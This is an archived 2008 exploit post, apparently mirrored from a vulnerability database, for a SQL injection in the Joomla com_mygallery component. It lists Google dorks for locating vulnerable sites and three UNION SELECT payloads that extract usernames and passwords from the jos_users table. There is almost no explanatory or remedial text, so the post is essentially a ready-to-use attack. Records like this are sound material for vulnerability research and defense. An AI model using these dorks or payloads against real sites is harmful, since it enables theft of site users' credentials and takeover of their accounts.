Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19239
HistoryFeb 22, 2008 - 12:00 a.m.

joomla SQL Injection(com_mygallery)

2008-02-2200:00:00
vulners.com
33

###############################################################

joomla SQL Injection(com_mygallery)

###############################################################

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl:"com_mygallery"cid

DORK 2 : allinurl:

################################################################
EXPLOIT :

-9999999//union//select//0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14//from/**/jos_users/*

-9999999//union//select//0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11//from/**/jos_users/*

-9999999//union//select//0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),concat(username,0x3a,password),15//from/**/jos_users/*

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################